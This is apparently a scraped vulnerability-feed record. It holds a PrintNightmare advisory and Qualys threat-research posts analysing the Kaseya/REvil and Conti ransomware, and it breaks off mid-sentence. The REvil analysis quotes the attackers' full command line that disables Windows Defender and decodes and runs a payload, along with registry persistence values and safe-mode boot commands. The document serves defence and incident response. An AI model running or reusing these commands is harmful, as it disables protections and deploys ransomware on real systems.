10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-34527"], "modified": "2021-09-23T13:47:51", "id": "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "href": "https://www.hivepro.com/are-you-a-victim-of-the-conti-ransomware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the ](<https://www.hivepro.com/wp-content/uploads/2021/06/TA202120.pdf>)[pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202122.pdf>)\n\nAttackers have been targeting Windows Print Spooler services for almost 2 months now. It started with the vulnerability(CVE-2021-1675) being exploited in the wild. Soon a patch was released for the same. It was after 2 days that Microsoft found out that there exist another vulnerability which gives the attacker an access to execute a code in the victim\u2019s system. This new vulnerability(CVE-2021-34527) has been named as PrintNightmare. An emergency patch has been released by Microsoft for some of the versions and a workflow as been made available for other versions.\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/07/image-1024x474.png)\n\n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>\n\n#### References\n\n<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>\n\n<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=notificationEmail#rapid7-analysis>\n\n<https://www.kaspersky.com/blog/printnightmare-vulnerability/40520/>", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T13:50:55", "type": "hivepro", "title": "Emergency patches have been released by Microsoft for PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-08T13:50:55", "id": "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5", "href": "https://www.hivepro.com/emergency-patches-have-been-released-by-microsoft-for-printnightmare/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-07-28T14:34:25", "description": "On July 2, 2021, [Kaseya announced](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) its software had been compromised and was being used to attack the IT infrastructure of its customers. The REvil ransomware attack leveraged multiple zero-day vulnerabilities in Kaseya\u2019s VSA (Virtual System/Server Administrator) product that helps Kaseya customers to monitor and manage their infrastructure. To deploy ransomware payloads on the systems of Kaseya customers and their clients, the REvil operators exploited zero-day vulnerability CVE-2021-30116.\n\nREvil ransomware (also known as Sodinokibi) is ransomware-as-a-service (RaaS), meaning an attacker distributes the licensed copy of this ransomware over the internet and the ransom is split between the developers. After an attack, REvil would threaten to publish the information on their page 'Happy Blog' unless the ransom is received.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/happy-blog.jpg)**Image Source**: [DarkTracer](<https://twitter.com/darktracer_int/status/1411866196199178244>)\n\nThe REvil ransomware group has demanded a $70 million payment to provide a universal decryptor tool to unlock the files corrupted by REvil ransomware.\n\nREvil\u2019s attacks on Kaseya VSA servers have led to outages in unexpected places, such as supermarket chains in Sweden, kindergartens in New Zealand, and some public administration offices in Romania. In a message posted on their dark web [blog](<https://twitter.com/darktracer_int/status/1411866196199178244>), the REvil gang officially took credit for the attack for the first time and claimed they locked more than one million systems during the Kaseya incident.\n\nOn July 4, [CISA and FBI](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) published an advisory to respond to REvil attack and have urged users to download the [Kaseya VSA Detection Tool](<https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40>) that determines if any indicators of compromise are present on system.\n\nKaseya is sharing regular updates on their [website](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-3rd-2021>) and believes that this has been localized to a very small number of on-premises customers only.\n\n### Identification of Assets using Qualys VMDR\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with Kaseya installed.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/GAI-1-1070x498.png)software:(publisher:Kaseya and product:"Kaseya Agent")\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 \u201cREvil ransomware\u201d. This helps in automatically grouping existing hosts with ransomware as well as any new systems that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n### Discover Kaseya VSA Vulnerability\n\nNow that hosts with REvil Ransomware are identified, you want to detect which of these assets have flagged this vulnerability. Qualys VMDR automatically detects new vulnerabilities like Kaseya VSA based on the always updated Knowledgebase.\n\nQualys has released an IG (information gathered) QID to detect the presence of Kaseya VSA.\n\nYou can see all your impacted hosts for this vulnerability tagged with the 'REvil Ransomware\u201d asset tag in the vulnerabilities view by using this QQL query:\n\n`vulnerabilities.vulnerability.qid: 48187`\n\nThis will return a list of all hosts that have Kaseya VSA installed.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/VulnSearch-1-1070x567.png)\n\nIG QID: 48187 is available in signature version VULNSIGS-2.5.226-3 and above and can be detected remotely.\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Picture-1.png)\n\nWith Qualys Unified Dashboard, you can track REvil ransomware, impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of Kaseya VSA vulnerability trends, EDR events and ransomware-related compliance controls in your environment using the [REvil ransomware Dashboard](<https://qualys-secure.force.com/customer/s/article/000006720>).\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/image005.png)\n\n### Workarounds\n\nDisable RDP if not used. If required change the RDP port to a non-standard port.\n\nAfter identifying vulnerable assets, monitor them for malicious activity. \n\nAs a best practice, follow these steps:\n\n * Keep operating systems, software, and applications current and up to date.\n * Make sure anti-virus and anti-malware solutions are set to automatically update and run regular scans.\n * Create backup copies of all important data as a good step towards securing the data. Backup copies can be kept on physically disconnected systems to maximize security.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching critical Kaseya VSA vulnerability CVE-2021-30116.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T17:07:54", "type": "qualysblog", "title": "Kaseya REvil Ransomware Attack (CVE-2021-30116) \u2013 Automatically Discover and Prioritize Using Qualys VMDR\u00ae", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-08T17:07:54", "id": "QUALYSBLOG:BBCD3487C0EA48E69315B0BB5F23D1C4", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:34:25", "description": "Over the past year, there has been a rise in extortion malware, e.g. [Nefilim](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>) and [Darkside](<https://blog.qualys.com/vulnerabilities-research/2021/06/09/darkside-ransomware>), which steal and threaten to publish sensitive data or encrypt it until a ransom is paid. Nowadays, cybercriminals use various techniques to gain their initial foothold within a network in the organization. One of the techniques is a supply chain attack.\n\nIn a software supply chain attack, hackers compromise an organization by manipulating the code in third-party software components used by the organization, such as what was seen with SolarWinds in December of 2020. On July 2, 2021, [Kaseya announced](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) its software had been compromised and was being used to attack the IT infrastructure of its customers. Kaseya VSA is an IT management suite, commonly used for managing software and patching for Windows OS, macOS, or third-party software. Unlike the SolarWinds attack, the attackers\u2019 goal was monetary gain rather than cyber espionage.\n\nThe attacks have been attributed to REvil, ransomware was first identified in April 2019 according to [MITRE](<https://attack.mitre.org/software/S0496/>). REvil is a ransomware family that has been linked to [GOLD SOUTHFIELD](<https://www.secureworks.com/research/threat-profiles/gold-southfield>), a financially motivated group that operates a \u201cRansomware as a service\u201d model. This group distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers.\n\nREvil attackers exfiltrate sensitive data before encryption. When ransoms are not paid, they have been known to shame victims by posting their data on the dark web. During our research, we have seen some of the victim sample data on their onion site.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/revil1.png)Fig. 1: Dark website\n\n### **Technical Details**\n\n#### **Initial access******\n\nThe ransomware was delivered via a malicious update payload sent out to the Kaseya VSA server platform. The REvil gang used a Kaseya VSA zero-day vulnerability ([CVE-2021-30116](<https://www.bleepingcomputer.com/news/security/kaseya-was-fixing-zero-day-just-as-revil-ransomware-sprung-their-attack/>)) in the Kaseya VSA server platform. \n\nSecurity researchers at [Huntress Labs](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>) and [TrueSec](<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>) have identified three zero-day vulnerabilities potentially used into attacks against their clients, including:\n\n * Authentication Bypass Vulnerability\n * Arbitrary File Upload Vulnerability\n * Code Injection Vulnerability****\n\n[Multiple sources ](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>)have stated that the following file was used to install and execute the ransomware attack on Windows systems:\n\nThe "Kaseya VSA Agent Hot-fix\u201d procedure ran the following command: \n\n`\"C:\\WINDOWS\\system32\\cmd.exe\" /c ping 127.0.0.1 -n 4979 > nul & C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe & echo %RANDOM% >> C:\\Windows\\cert.exe & C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & del /q /f c:\\kworking\\agent.crt C:\\Windows\\cert.exe & c:\\kworking\\agent.exe`\n\nThe above command disables Windows Defender, copies and renames certutil.exe to %SystemDrive%\\Windows, and decrypts the agent.crt file. Certutil.exe is mostly used as a \u201cliving-off-the-land\u201d binary and is capable of downloading and decoding web-encoded content. In order to avoid detection, the attacker copied this utility as %SystemDrive`%\\cert.exe` and executed the malicious payload agent.exe.\n\nagent.exe| d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e \n---|--- \n \nThe agent.exe contains two resources (MODLS.RC, SOFIS.RC) in it as shown in the following image.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-2-Resourse.png)Fig. 2: Resource from agent.exe\n\nAgent.exe dropped these resources in the windows folder. Resources named MODLIS and SOFTIS were dropped as mpsvc.dll and MsMpEng.exe respectively.\n\nMODLIS| e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 \n---|--- \nmpsvc.dll| 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd \nSOFTIS| 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a \nMsMpEng.exe| 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a \n \nMsMpeng.exe is an older version of Microsoft\u2019s Antimalware Service executable which is vulnerable to a DLL side-loading attack. In a DLL side-loading attack, malicious code is in a DLL file with a similar name which is required for the target executable.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-3-Version_info.png)Fig. 3: Version information of MsMpeng.exe\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-4-Digital_signature_info.png)Fig. 4: Digital certificate information of MsMpeng.exe\n\nAgent.exe then drops MsMpeng.exe and mpsvc.dll. After dropping these two files, agent.exe executes MsMpeng.exe as shown in the following image.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-5-Write_resource_Create_process.png)Fig. 5: Drop files and create a process of MsMpEng.exe\n\n### **Ransomware Execution******\n\nWhen MpMseng.exe runs and calls the ServiceCrtMain, the Malicious Mpsvc.dll loads and gets loaded and executed.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-6-MsMpEng_start.png)Fig. 6: ServiceCrtMain call function of MsMpEng.exe\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-7-mpsvc_Start_point.png)Fig. 7: ServiceCrtMain call function of MsMpEng.exe\n\nRansomware uses OpenSSL to conduct its Cryptographic Operations.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-8-Cryptographic_operation.png)Fig. 8: Use OpenSSL to conduct Cryptographic Operations\n\nMalware uses \u2018CreateFileMappingW\u2019 and \u2018MapViewOfFile\u2019 functions to bring code in memory. \u2018CreateFileMapping\u2019 function is useful to load a file into memory. The function creates a handle to the mapping while the \u2018MapViewOfFile\u2019 function maps the file into memory space and returns a pointer to the start of the mapped file.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/CreateFileMappingViewW.png)Fig. 9: Use CreateFileMappingW and MapViewOfFile to bring code in memory \n\nMalware allocates memory and decrypts the main payload (PE file) in memory. Malware removes some unused magic constants from the header to evade it. Magic constants such as 0x4D5A (MZ) 0x5045 (PE). This method requires loading and executing a payload just like a shellcode.\n\nNowadays most of malware authors use custom packers, these packers, unpack and load payload module without PE Header magic constants at load time. These Packers keep other relevant information from PE Header, such as section header, API import, and relocations data, etc.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Main_Payload.png)Fig. 10: Main Payload \n\nMalware Decrypts and bring config file. Config file is in JSON format.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Config_File-1070x257.png)Fig. 11: Config File\n\nConfig file contain following fields.\n\nField| Definition \n---|--- \npk | Public key in base 64 \npid | Version ID \nsub | tag Number \ndbg | Is it dbg mode \net | encryption type \nwipe | wipe folder flag \nfld | Folder list that wants to to skip during the encryption process \nfls | File list that wants to to skip during the encryption process \next | file extension that wants to to skip during the encryption process \nwfld | The folder it wants to wipe \nprc | Process name list it wants to terminate \ndmn | Potential list of C&C Domains \nnet | Communication flag \nsvc | Service name list that wants to stop \nnbody | Ransomware note in base64 format \nnname | Ransomware note file extension \nexp | Flag to local privledge escalation \nimg | Ransomware note that will be in bitmap form \narn | Persistence flag \nrdmcnt | Readme count \n \nRansomware makes the following changes in the local Firewall rule.\n\n\u201cnetsh advfirewall firewall set rule group==\u201dNetwork Discovery\u201d new enable=Yes\u201d\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-9-netsh.png)Fig. 12: Command to change local firewall\n\nIt creates the following Registry entry: \n`HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\BlackLivesMatter`\n\nThe following values are added in HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\BlackLivesMatter:\n\n`96Ia6 = {Hex Value}` \n`Ed7 = {Hex Value}` \n`JmfOBvhb = {Hex Value}` \n`QIeQ = {Hex Value}` \n`Ucr1RB = {Hex Value}` \n`wJWsTYE = .{appended extension to files after encryption}`\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Registry-1070x122.png)\n\nThe malware adds registry values under the following Registry Key. \n\n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon`\n\n * AutoAdminLogon = 1 \n * DefaultUserName = {Current User Name} \n * DefaultPassword = \u201cDTrump4ever\u201d \n\nWith the above Registry values, windows will automatically log in with new account information. \n\nThe malware executes the following commands to force the computer to boot into safe mode with Networking: \n`bcdedit /set {current} safeboot network`\n\nAlso, malware add the same command in Registry under \n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce`\n\n`*MarineLePen = bcdedit /set {current} safeboot network `\n\nFinally, a ransom note is dropped using a random filename for example \u201cs5q78-readme.txt\u201d.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-10-Encryption-Message.png)Fig. 13: Ransom note\n\n### Dashboard\n\nTo track your exposure, download and run the [Kaseya (REvil RansomWare) dashboard](<https://qualys-secure.force.com/customer/s/article/000006720>).\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/kaseya-REvil-1070x796.png)\n\n### Artifact\n\n * The group launches 0day authorization [bypass/SQL injection](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>) attack via the userFilterTableRpt.asp file.\n * In the first stage, they delete logs in multiple locations (IIS logs as well as logs stored in the application database).\n * The group delivers a PowerShell payload that disables Windows Defender.\n * The group copied and renamed certutil.exe to cert.exe before running the commands.\n * The group uses certutil.exe to decode and execute the previously uploaded agent.crt to agent.exe files.\n * The group uploaded a .js file masqueraded as a .jpg file - screenshot.jpg.\n * The group has used services like Shodan to collect a list of targets before attacking.\n * The group encrypts files on victim systems and demands a ransom to decrypt the files.\n\n### REvil TTP Map\n\nReconnaissance| Initial Access| Execution| Defense Evasion| Command and Control| Impact \n---|---|---|---|---|--- \nSearch Open Technical Databases: Scan Databases (T1596.005)| Exploit Public-Facing Application (T1190)| Command and Scripting Interpreter: PowerShell (T1059.001)| Indicator Removal on Host: File Deletion (T1070.004)| Ingress Tool Transfer (T1105)| Data Manipulation: Stored Data Manipulation (T1565.001) \n| | | Deobfuscate/Decode Files or Information (T1140)| | Data Encrypted for impact (T1486) \n| | | Masquerading (T1036)| | Defacement: Internal Defacement (T1491.001) \n| | | Masquerading: Rename System Utilities (T1036.003)| | \n| | | Hijack Execution Flow: DLL Side-Loading (T1574.002)| | \n| | | Subvert Trust Controls: Code Signing (T1553.002)| | \n| | | Impair Defenses: Disable or Modify System Firewall (T1562.004)| | \n| | | Virtualization/Sandbox Evasion: Time Based Evasion (T1497.003)| | \n| | | Modify Registry (T1112)| | \n| | | Impair Defenses: Disable or Modify Tools (T1562.001)| | \n \n### **Mitigation or **Additional Important Safety Measures\n\n#### Network\n\n * Keep strong and unique passwords for login accounts.\n * Disable RDP if not used. If required change the RDP port to a non-standard port.\n * Configure firewall in the following way:\n * Deny access to Public IPs to important ports (in this case RDP port 3389),\n * Allow access to only IPs which are under your control.\n * Use VPN to access the network, instead of exposing RDP to the Internet. Possibility to implement Two Factor Authentication (2FA).\n * Set lockout policy which hinders credentials guessing.\n * Create a separate network folder for each user when managing access to shared network folders.\n\n#### **Take regular data backup**\n\n * Protect systems from ransomware by periodically backing up important files regularly and keep a recent backup copy offline. Encrypt your backup.\n * If your computer gets infected with ransomware, your files can be restored from the offline backup once the malware has been removed.\n * Always use a combination of online and offline backup.\n * Do not keep offline backups connected to your system as this data could be encrypted when ransomware strike.\n\n#### **Keep software updated**\n\n * Always keep your security software (antivirus, firewall, etc.) up to date to protect your computer from new variants of malware.\n * Regularly patch and update applications, software, and operating systems to address any exploitable software vulnerabilities.\n * Do not download cracked/pirated software as they risk backdoor entry for malware into your computer.\n * Avoid downloading software from untrusted P2P or torrent sites. In most cases, they are malicious software.\n\n#### **Having minimum required privileges**\n\n * Do not assign Administrator privileges to users. Most importantly, do not stay logged in as an administrator unless it is strictly necessary. Also, avoid browsing, opening documents, or other regular work activities while logged in as an administrator. \n\n### Indicators of Compromise (IOCs)\n\nSHA256\n\nd55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e \n8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd \ne2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2\n\n### References\n\n * <https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack>\n * [https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/ ](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/ \u2028>)\n * [https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/](<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/\u2028>)\n * <https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>\n * <https://www.tenable.com/blog/cve-2021-30116-multiple-zero-day-vulnerabilities-in-kaseya-vsa-exploited-to-distribute-ransomware>\n * <https://www.secureworks.com/research/threat-profiles/gold-southfield>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T23:41:59", "type": "qualysblog", "title": "Analyzing the REvil Ransomware Attack", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-07T23:41:59", "id": "QUALYSBLOG:894189F1B83B90193612FF586BF7576F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-18T18:37:13", "description": "Conti is a sophisticated Ransomware-as-a-Service (RaaS) model first detected in December 2019. Since its inception, its use has grown rapidly and has even displaced the use of other RaaS tools like Ryuk. The [Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI)](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/22/cisa-fbi-and-nsa-release-joint-cybersecurity-advisory-conti>) issued a warning about Conti in Sept 2021, noting that they had observed it being used in more than 400 cyberattacks globally, though concentrated in North America and Europe.\n\nThe most common initial infection vectors used are spear phishing and RDP (Remote Desktop Protocol) services. Phishing emails work either through malicious attachments, such as Word documents with an embedded macro that can be used to drop/download BazarLoader, Trickbot, IceID trojans, or via social engineering tactics employed to get the victim to provide additional information or access credentials. Following initial access, attackers download and execute a Cobalt Strike beacon DLL to gather information about domain admin accounts. Additionally, threat actors use Kerberos attacks to attempt to get admin hash in order to conduct brute force attacks.\n\nA Conti affiliate recently leaked what has been dubbed the [Conti playbook](<https://www.bleepingcomputer.com/news/security/translated-conti-ransomware-playbook-gives-insight-into-attacks/>). The playbook revealed that Conti actors also exploit vulnerabilities in unpatched assets to escalate privileges and move laterally across a victim\u2019s network. They check for the "PrintNightmare" vulnerability (CVE-2021-34527) in Windows Print spooler service, EternalBlue vulnerability (CVE-2017-0144) in Microsoft Windows Server Message Block, and the "Zerologon" vulnerability (CVE-2020-1472) in Microsoft Active Directory Domain Controller. The playbook has been translated from Russian to English by security researchers and has provided other useful Indicators of Compromise (IoC).\n\nConti actors also use the RouterScan tool to identify router devices in a provided range of IPs and attempt to find logins/passwords from a standard list available with the RouterScan tool. They then install AnyDesk or Atera on the target machine to maintain an open communication channel. Like other ransomware attacks, Conti actors exfiltrate data from victims\u2019 networks to cloud storage services like MEGA and then deploy Conti ransomware. To upload data on cloud storage Conti uses open-source Rclone command-line software. They use a double extortion approach in which they demand a ransom to release the encrypted data or threaten to publicly release it if a ransom is not paid. They may also sell the data to the highest bidder.\n\n### Technical Details:\n\nConti ransomware uses obfuscation. The most notable use is to hide various Windows API calls used by the malware. It is common for some malware to lookup API calls during execution. Initially, it brings import module names then decrypts the API names and gets their addresses.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-1-De-obfuscation-of-Windows-API.png)Fig. 1 De-obfuscation of Windows API\n\nConti uses a unique String Decryption Routine that is applied to almost every string text or API name used by the malware as shown in Fig. 2:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-2-String-Decryption-Routine.png)Fig. 2 String Decryption Routine\n\nAfter getting API addresses, it calls for `CreateMutexA` API with the Mutex Value of "_CONTI_" as shown below in Fig. 3:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-3-Create-Mutex.png)Fig. 3 Create Mutex\n\nIt deletes Windows Volume Shadow Copies and also resizes shadow storage for drives C to H:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-4-Deletes-Windows-Volume-Shadow-Copy.png)Fig. 4 Deletes Windows Volume Shadow Copy\n\nNext, Conti executes commands for stopping potential Windows Services related to antivirus, security, backup, database, and email solutions:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-5-Stop-Potential-Windows-Services.png)Fig. 5 Stop Potential Windows Services\n\nThe table below contains the names of the Windows Services that Conti stopped by calling the code in Fig. 5 in the loop.\n\nMSSQL$BKUPEXEC| MSSQL$SQLEXPRESS| MSSQLFDLauncher$SHAREPOINT \n---|---|--- \nMSSQL$ECWDB2| MSSQL$SYSTEM_BGC| MSSQLFDLauncher$SQL_2008 \nMSSQL$PRACTICEMGT| MSSQL$TPS| MSSQLFDLauncher$SYSTEM_BGC \nMSSQL$PRACTTICEBGC| MSSQL$TPSAMA| MSSQLFDLauncher$TPS \nMSSQL$PROD| MSSQL$VEEAMSQL2008R2| MSSQLFDLauncher$TPSAMA \nMSSQL$PROFXENGAGEMENT| MSSQL$VEEAMSQL2008R2| MSSQLSERVER \nMSSQL$SBSMONITORING| MSSQL$VEEAMSQL2012| MSSQLServerADHelper \nMSSQL$SHAREPOINT| MSSQLFDLauncher| MSSQLServerADHelper100 \nMSSQL$SOPHOS| MSSQLFDLauncher$PROFXENGAGEMENT| MSSQLServerOLAPService \nMSSQL$SQL_2008| MSSQLFDLauncher$SBSMONITORING| MySQL57 \nAcronis VSS Provider| Mfemms| DCAgent \nAcronisAgent| Mfevtp| EhttpSrv \nAcrSch2Svc| MMS| Ekrn \nAntivirus| Mozyprobackup| Enterprise Client Service \nARSM| MsDtsServer| EPSecurityService \nAVP| MsDtsServer100| EPUpdateService \nBackupExecAgentAccelerator| MsDtsServer110| EraserSvc11710 \nBackupExecAgentBrowser| MSExchangeES| EsgShKernel \nBackupExecDeviceMediaService| MSExchangeIS| ESHASRV \nBackupExecJobEngine| MSExchangeMGMT| FA_Scheduler \nBackupExecManagementService| MSExchangeMTA| MSOLAP$TPSAMA \nBackupExecRPCService| MSExchangeSA| McShield \nBackupExecVSSProvider| MSExchangeSRS| McTaskManager \nBedbg| msftesql$PROD| Mfefire \nIISAdmin| MSOLAP$SQL_2008| Klnagent \nIMAP4Svc| MSOLAP$SYSTEM_BGC| MSOLAP$TPS \n \nConti also leverages the Windows Restart Manager to close applications and services that are running in order to make them available for encryption and to maximize the damage:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-6-Unlock-files-with-Windows-Restart-Manager.png)Fig. 6 Unlock files with Windows Restart Manager\n\nIt collects information about drives and drive types present on compromised systems:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-7-Collect-Drives-Information.png)Fig. 7 Collect Drives Information\n\nAs shown in 